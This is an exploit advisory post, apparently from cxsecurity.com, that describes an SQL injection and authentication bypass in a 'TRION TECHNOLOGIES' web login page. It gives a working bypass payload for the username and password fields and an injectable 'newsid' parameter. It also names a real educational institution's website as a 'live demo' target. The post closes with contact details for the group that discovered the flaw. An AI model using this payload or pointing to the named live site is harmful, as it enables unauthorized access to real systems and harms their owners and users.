TRION TECHNOLOGIES SQL Injection | Authentication Bypass

Published
Credit
Risk
2017.06.19
Mersad Security Research
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Exploit Title: TRION TECHNOLOGIES - SQL Injection | Authentication Bypass
# Google Dork: N/A
# Date: 2017-06-19
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
# CVE : -
--------------------------------------
Exploit Bypass:/login.php

http://127.0.0.1/login.php


username:'=' 'or'
password:'=' 'or'
-------------------------------------

Live Demo Bypass:
http://www.amccomilla.edu.bd/login.php


Live Demo SQL Injection:
http://www.amccomilla.edu.bd/news-more.php?newsid=7[SQLi]

-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com
# Sh4dow - Cyrus - SOLTAN SILENT - AminStev


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com